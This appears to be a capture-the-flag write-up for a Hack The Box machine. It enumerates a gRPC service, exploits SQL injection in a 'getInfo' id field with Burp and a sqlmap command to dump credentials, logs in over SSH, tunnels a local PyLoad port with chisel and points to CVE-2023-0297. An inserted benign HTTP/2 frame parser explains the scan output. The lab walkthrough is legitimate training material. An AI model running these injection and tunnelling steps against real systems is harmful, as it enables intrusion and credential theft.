$ nmap -p- --min-rate 3000 -Pn 10.129.40.34
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-21 03:19 EDT
Nmap scan report for 10.129.40.34
Host is up (0.17s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
50051/tcp open unknown
Port 50051 -> gRPC
I've never seen port 50051 open on an HTB machine before, so I ran a detailed nmap scan too:
$ sudo nmap -p 22,50051 -sC -sV -O -T4 10.129.40.34
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-21 03:20 EDT
Nmap scan report for 10.129.40.34
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| 256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_ 256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port50051-TCP:V=7.93%I=7%D=5/21%Time=6469C65A%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x0
SF:6\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(Generic
SF:Lines,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(GetRe
SF:quest,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(HTTPO
SF:ptions,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0
SF:\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RTSP
SF:Request,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\
SF:0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RPC
SF:Check,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(DNSVe
SF:rsionBindReqTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\
SF:xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0
SF:")%r(DNSStatusRequestTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0
SF:\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\
SF:0\0\?\0\0")%r(Help,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0
SF:\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\
SF:0\0")%r(SSLSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x0
SF:5\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0
SF:\?\0\0")%r(TerminalServerCookie,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xf
SF:f\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0
SF:\0\0\0\0\0\?\0\0")%r(TLSSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?
SF:\xff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x0
SF:8\0\0\0\0\0\0\?\0\0")%r(Kerberos,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x
SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\
SF:0\0\0\0\0\0\?\0\0")%r(SMBProgNeg,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x
SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\
SF:0\0\0\0\0\0\?\0\0")%r(X11Probe,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff
SF:\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\
SF:0\0\0\0\0\?\0\0");
I see that this has some headers. I tried connecting using telnet or nc, then viewing the traffic within Wireshark, but all I saw was this:
Just a bunch of unrelated TCP traffic. I tried running curl on the port and received another weird error.
$ curl http://10.129.40.34:50051
curl: (1) Received HTTP/0.9 when not allowed
Googling about this error leads me to a post about gRPC servers.
There are specific tools that are used to interact with this software, and we can test a few of them to make sure that this is gRPC. I googled for tools that could enumerate this, and found grpc-client-cli.
The tool worked, which means this is indeed gRPC running.
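Added example (not part of the original write-up): the 46 bytes nmap recorded for every probe in the fingerprint above are an HTTP/2 server preface, a SETTINGS frame followed by a WINDOW_UPDATE, which is why curl's HTTP/1.1 request failed and why a gRPC client was the right next step. The parser below decodes that reply offline. Function names are chosen for this example, and setting id 0xfe03 is not defined in RFC 9113, so it is reported by its raw id.

```python
import struct

# Reply to nmap's NULL probe, copied from the fingerprint above (0x2E = 46 bytes).
# nmap prints the byte 0x3f as "\?".
NULL_PROBE_REPLY = (
    b"\x00\x00\x18\x04\x00\x00\x00\x00\x00"   # frame header: len 24, type 4
    b"\x00\x04\x00\x3f\xff\xff\x00\x05\x00\x3f\xff\xff"
    b"\x00\x06\x00\x00\x20\x00\xfe\x03\x00\x00\x00\x01"
    b"\x00\x00\x04\x08\x00\x00\x00\x00\x00"   # frame header: len 4, type 8
    b"\x00\x3f\x00\x00"
)

FRAME_TYPES = {0x4: "SETTINGS", 0x8: "WINDOW_UPDATE"}       # subset of RFC 9113
SETTING_NAMES = {0x4: "INITIAL_WINDOW_SIZE", 0x5: "MAX_FRAME_SIZE",
                 0x6: "MAX_HEADER_LIST_SIZE"}                # subset of RFC 9113

def parse_frames(buf):
    """Split bytes into HTTP/2 frames; raise ValueError if they do not fit."""
    frames, off = [], 0
    while off < len(buf):
        if len(buf) - off < 9:
            raise ValueError("truncated frame header")
        # 24-bit length, 8-bit type, 8-bit flags, 1 reserved bit + 31-bit stream id
        hi, lo, ftype, flags, stream = struct.unpack_from(">BHBBI", buf, off)
        length = (hi << 16) | lo
        payload = buf[off + 9:off + 9 + length]
        if len(payload) != length:
            raise ValueError("declared length exceeds captured data")
        frames.append({"type": FRAME_TYPES.get(ftype, hex(ftype)), "flags": flags,
                       "stream": stream & 0x7FFFFFFF, "payload": payload})
        off += 9 + length
    return frames

def decode_settings(payload):
    """A SETTINGS payload is a sequence of (16-bit id, 32-bit value) pairs."""
    if len(payload) % 6:
        raise ValueError("SETTINGS payload is not a multiple of 6 bytes")
    pairs = (struct.unpack_from(">HI", payload, i) for i in range(0, len(payload), 6))
    return {SETTING_NAMES.get(ident, hex(ident)): value for ident, value in pairs}

def looks_like_http2_server(buf):
    """True if the data opens with a non-ACK SETTINGS frame on stream 0."""
    try:
        first = parse_frames(buf)[0]
    except (ValueError, IndexError):
        return False
    return first["type"] == "SETTINGS" and first["stream"] == 0 and not first["flags"] & 0x1

if __name__ == "__main__":
    for f in parse_frames(NULL_PROBE_REPLY):
        print(f["type"], decode_settings(f["payload"]) if f["type"] == "SETTINGS" else f["payload"].hex())
```

A server that sends this preface to an empty connection speaks cleartext HTTP/2 with prior knowledge, which on port 50051 points to gRPC.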
SimpleApp Enum -> SQL Injection
This thing was running a 'SimpleApp' application, and we can enumerate it to see the default values accepted, create a user and login.
$ ./grpc-client-cli -V 10.129.40.34:50051
? Choose a service: SimpleApp
? Choose a method: RegisterUser
Message json (type ? to see defaults): ?
{"username":"","password":""}
Message json (type ? to see defaults): {"username":"test","password":"test123"}
{"message":"Account created for user test!"}
Method: /SimpleApp/RegisterUser
Status: 0 OK
Request Headers:
user-agent: [grpc-go/1.53.0]
Response Headers:
content-type: [application/grpc]
grpc-accept-encoding: [identity, deflate, gzip]
Request duration: 180.052244ms
Request size: 20 bytes
Response size: 41 bytes
? Choose a method: LoginUser
Message json (type ? to see defaults): {"username":"test","password":"test123"}
{"message":"Your id is 899."}
Method: /SimpleApp/LoginUser
Status: 0 OK
Request Headers:
user-agent: [grpc-go/1.53.0]
Response Headers:
content-type: [application/grpc]
grpc-accept-encoding: [identity, deflate, gzip]
Response Trailers:
token: [b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NDY2NDY4M30.JkX8rMMOYdWbSBiUnGmjKH85lwXj1JI-nJD4J5ELbkY']
Request duration: 181.44517ms
Request size: 20 bytes
Response size: 166 bytes
So obviously, we have to exploit this to get the administrator account somehow. When I try to use the getInfo function, it complains that I don't have a valid token.
Using this, we can capture the request in Burp Suite and attempt to include our administrator token. This was the HTTP request I sent via Burp, and it kept running into an error:
POST /invoke/SimpleApp.getInfo HTTP/1.1
Host: 127.0.0.1:35935
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
x-grpcui-csrf-token: CUWLdMi5MxC2Io1JfHZ_oSUCHn4YZO5fYhkk2qAd9nk
X-Requested-With: XMLHttpRequest
Content-Length: 193
Origin: http://127.0.0.1:35935
Connection: close
Referer: http://127.0.0.1:35935/
Cookie: _grpcui_csrf_token=CUWLdMi5MxC2Io1JfHZ_oSUCHn4YZO5fYhkk2qAd9nk
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODQ2NjUwNzF9.iur8GhCEFahebtqwyeFLj7wybSwtO4qesiLEWKTv614"}],"data":[{"id":"123"}]}
I thought it was intentional, so I attempted some basic command and SQL injection. I found that UNION SQL injection works!
Using version enumeration, we can find that this uses SQLite.
I tossed this Burp request to sqlmap, which also gives me a true positive.
sqlmap -r req -p id --level 5 --risk 3 --dbms sqlite
Then, we can enumerate the database and dump the passwords within the database.
We had credentials for this user, and it works with ssh.
Privilege Escalation
PyLoad -> CVE-2023-0297 RCE
When checking netstat output, we can see that port 8000 is open on the machine:
sau@pc:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9666 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::50051 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
We can use chisel or ssh to port forward this and view it within our browser.
# within Kali
chisel server -p 5555 --reverse
# within host
chisel client 10.10.14.39:5555 R:8000:127.0.0.1:8000
Here, we will see a PyLoad instance.
This software had a recent RCE vulnerability found within it.